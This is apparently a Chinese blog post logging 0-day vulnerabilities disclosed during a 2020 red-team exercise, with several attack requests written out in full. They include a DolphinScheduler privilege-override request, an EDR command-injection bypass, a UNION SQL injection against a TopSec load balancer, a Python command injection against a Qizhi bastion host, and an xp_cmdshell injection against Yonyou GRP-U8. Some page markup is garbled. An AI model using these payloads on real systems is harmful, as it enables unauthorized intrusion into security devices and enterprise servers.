2020 HW记录

编程入门行业动态更新时间:2024-10-23 19:23:21

2020 <a href=https://www.elefans.com/category/jswz/34/1730897.html style= HW记录"/>

2020 HW记录

2020 HW记录-2

0x00 前言

9.11 hw开始了，记录下整个hw期间爆的0day
虽然自己有点想法有所收获，碍于信息比较敏感的缘故，还是hw结束后再发这儿比较好。
hw可是个学习的好机会啊，冲鸭大伙儿

0x02 漏洞

一.常规漏洞

1.Apache DolphinScheduler高危漏洞

漏洞编号：CVE-2020-11974、CVE-2020-13922

1.1Apache DolphinScheduler权限覆盖漏洞（CVE-2020-13922）

poc

id=1&userName=admin&userPassword=Password1!&tenantId=1&email=sdluser%40sdluser.sdluser&phone=

受影响版本

Apache DolphinScheduler = 1.2.0、1.2.1、1.3.1

不受影响版本

Apache DolphinScheduler >= 1.3.2

1.2Apache DolphinScheduler远程执行代码漏洞（CVE-2020-11974）

受影响版本

Apache DolphinScheduler = 1.2.0、1.2.1

不受影响版本

Apache DolphinScheduler >= 1.3.1

参考：

@apache/msg06076.html

2.WPS 0day

.html

二.安全设备漏洞

1.你们懂的-sanX EDR（新版）

绕过:{“params”:“w=123”‘1234123’"|命令"}

结果如下:

![image.png](.png#align=left&display=inline&height=212&margin=[object Object]&name=image.png&originHeight=423&originWidth=894&size=319693&status=done&style=none&width=447)

2.天融信Top-app LB负载均衡SQL注入

天融信TopApp-LB 负载均衡系统sql注入

POST /acc/clsf/report/datasource.php HTTP/1.1
Host:
Connection: close
Accept: text/javascript, text/html, application/xml, text/xml, */*
X-Prototype-Version: 1.6.0.3
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=ijqtopbcbmu8d70o5t3kmvgt57
Content-Type: application/x-www-form-urlencoded
Content-Length: 201t=l&e=0&s=t&l=1&vid=1+union select 1,2,3,4,5,6,7,8,9,substr('a',1,1),11,12,13,14,15,16,17,18,19,20,21,22--+&gid=0&lmt=10&o=r_Speed&asc=false&p=8&lipf=&lipt=&ripf=&ript=&dscp=&proto=&lpf=&lpt=&rpf=&rpt=@。。

3.绿盟UTS管理员任意登录漏洞

此漏洞据内部人士透露一个月前已修复并为客户升级

对响应包进行修改，将false更改为true的时候可以泄露管理用户的md5值密码

4.齐治堡垒机

老版本poc

post:
/shterm/listener/tui_update.php
data:
a=["t';import os;os.popen('ls')#"]

据说新版poc是java的

5.联软准入

6.用友GRP-u8 注入


POST /Proxy HTTP/1.1
Accept: Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;)
Host: host
Content-Length: 357
Connection: Keep-Alive
Cache-Control: no-cachecVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">exec xp_cmdshell 'net user'</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>